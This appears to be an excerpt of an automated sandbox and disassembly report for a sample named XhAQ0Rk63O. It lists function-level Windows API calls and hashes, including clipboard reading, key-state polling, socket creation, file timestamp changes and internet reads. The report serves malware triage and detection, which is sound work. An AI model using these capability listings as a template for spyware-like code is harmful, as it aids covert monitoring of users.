                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                          • String ID: *.*
                                                                                          • API String ID: 2693929171-438819550
                                                                                          • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                          • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                          • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                          • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(?), ref: 0046C635
                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                          • CloseClipboard.USER32 ref: 0046C65D
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                          • CloseClipboard.USER32 ref: 0046C692
                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                          • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                          • CloseClipboard.USER32 ref: 0046C866
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                          • String ID: HH
                                                                                          • API String ID: 589737431-2761332787
                                                                                          • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                          • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                          • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                          • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                          APIs
                                                                                          • __wcsicoll.LIBCMT ref: 0043643C
                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                          • __wcsicoll.LIBCMT ref: 00436466
                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicollmouse_event
                                                                                          • String ID: DOWN
                                                                                          • API String ID: 1033544147-711622031
                                                                                          • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                          • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                          • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                          • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                          APIs
                                                                                            • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 4170576061-0
                                                                                          • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                          • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                          • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                          • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                          • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                          • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                          • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3539004672-0
                                                                                          • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                          • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                          • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                          • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                          APIs
                                                                                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                          • IsWindowVisible.USER32 ref: 00477314
                                                                                          • IsWindowEnabled.USER32 ref: 00477324
                                                                                          • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                          • IsIconic.USER32 ref: 0047733F
                                                                                          • IsZoomed.USER32 ref: 0047734D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                          • String ID:
                                                                                          • API String ID: 292994002-0
                                                                                          • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                          • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                          • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                          • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75573220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                          • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                          • String ID:
                                                                                          • API String ID: 3397143404-0
                                                                                          • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                          • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                          • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                          • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: ACCEPT$^$h
                                                                                          • API String ID: 909875538-4263704089
                                                                                          • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                          • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                          • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                          • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                          APIs
                                                                                          • _set_new_mode.LIBCMT ref: 0040D88C
                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D8B9
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                                                                                          • String ID: Wu
                                                                                          • API String ID: 1188159508-4083010176
                                                                                          • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                          • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                                                                                          • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                          • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                          • API String ID: 0-2165971703
                                                                                          • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                          • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                          • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                          • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                          • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                          • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                          • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                          • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                          • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                          • String ID:
                                                                                          • API String ID: 48322524-0
                                                                                          • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                          • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                          • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                          • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                          APIs
                                                                                          • __time64.LIBCMT ref: 004433A2
                                                                                            • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                            • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                          • String ID: rJ
                                                                                          • API String ID: 2893107130-1865492326
                                                                                          • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                          • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                          • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                          • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                          APIs
                                                                                          • __time64.LIBCMT ref: 004433A2
                                                                                            • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                            • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                          • String ID: rJ
                                                                                          • API String ID: 2893107130-1865492326
                                                                                          • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                          • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                          • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                          • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                          APIs
                                                                                          • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 901099227-0
                                                                                          • Opcode ID: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                          • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                          • Opcode Fuzzy Hash: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                          • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                          • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          • API String ID: 2295610775-0
                                                                                          • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                          • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                          • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                          • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0vH$HH
                                                                                          • API String ID: 0-728391547
                                                                                          • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                          • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                          • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                          • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset
                                                                                          • String ID:
                                                                                          • API String ID: 2102423945-0
